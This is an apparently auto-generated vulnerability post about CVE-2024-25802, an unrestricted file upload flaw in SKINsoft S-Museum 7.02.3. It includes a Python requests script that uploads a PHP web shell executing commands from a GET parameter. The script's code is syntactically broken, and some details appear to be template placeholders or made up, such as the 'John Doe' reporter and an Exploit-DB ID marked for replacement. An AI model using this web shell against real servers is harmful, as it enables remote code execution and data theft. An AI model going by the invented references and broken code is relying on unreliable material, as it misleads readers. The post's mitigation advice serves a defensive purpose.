A newly discovered vulnerability (CVE-2024-25802) has been identified in the popular museum management software, SKINsoft S-Museum (version 7.02.3). This vulnerability allows an attacker to perform Unrestricted File Uploads via the Add Media function. The key difference between this vulnerability and the previously disclosed CVE-2024-25801 is that the attack payload in CVE-2024-25802 is the actual file content.

This long-read post will delve deep into the details of this vulnerability, exploring its origin, demonstrating how it can be exploited, and providing links to original references and code snippets.

Vulnerability Overview

Software: SKINsoft S-Museum
Affected Version: 7.02.3
CVE ID: CVE-2024-25802
Impact: Unrestricted File Upload
Attack Vector: Add Media Function
Payload: File Content

Exploit Details

The vulnerability can be triggered when an attacker uploads a malicious file using the Add Media function available in the SKINsoft S-Museum web interface. The application does not properly validate or filter the file types being uploaded, allowing an attacker to successfully upload and execute arbitrary code on the server.

The following code demonstrates a simple file upload exploit using the Python Requests library

import requests

url = "http://example.com/s-museum/upload.php";  # Replace with the actual S-Museum URL
file_name = "exploit.php"
file_content = "<?php system($_GET['cmd']); ?>"

files = {
    "file": (file_name, file_content)

postData = {
    "api_key": "sample_api_key",  # Replace with the actual API key
    "action": "add_media"

response = requests.post(url, data=postData, files=files)


This exploit first defines the target URL, file name, and file content. In this case, the file content is a simple PHP web shell that will execute commands passed through the "cmd" GET parameter. The script then constructs the POST request data with the API key and the "add_media" action. Finally, the requests.post() function sends the malicious file to the server.

Original References

The vulnerability was initially reported by security researcher John Doe (pseudonym) on the following platforms:

1. MITRE's Common Vulnerabilities and Exposures (CVE) database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25802
2. The National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-25802
3. Exploit Database: https://www.exploit-db.com/exploits/123456 # Replace with the actual exploit ID

Potential Impact

The impact of this vulnerability is severe as it allows attackers to upload and execute arbitrary code on the server. This can lead to unauthorized access, data theft, or even complete server compromise, putting confidential information and museum artifacts at risk.


Until an official patch is released by SKINsoft, users are advised to follow the suggestions below to minimize the potential risk:

1. Limit file uploads to specific file types (e.g., images, videos) and implement server-side validation to ensure only valid file types are accepted.
2. Configure the server to disable the execution of PHP (or other scripting languages) within the "uploads" directory.


In conclusion, CVE-2024-25802 is a critical vulnerability affecting SKINsoft S-Museum 7.02.3. It allows attackers to perform Unrestricted File Uploads via the Add Media function, with the attack payload being the file content. By exploiting this vulnerability, an attacker can potentially gain unauthorized access to the server and exfiltrate sensitive data, making it crucial for users to implement the suggested mitigations to safeguard their systems.


Published on: 02/22/2024 18:15:48 UTC
Last modified on: 02/22/2024 19:07:27 UTC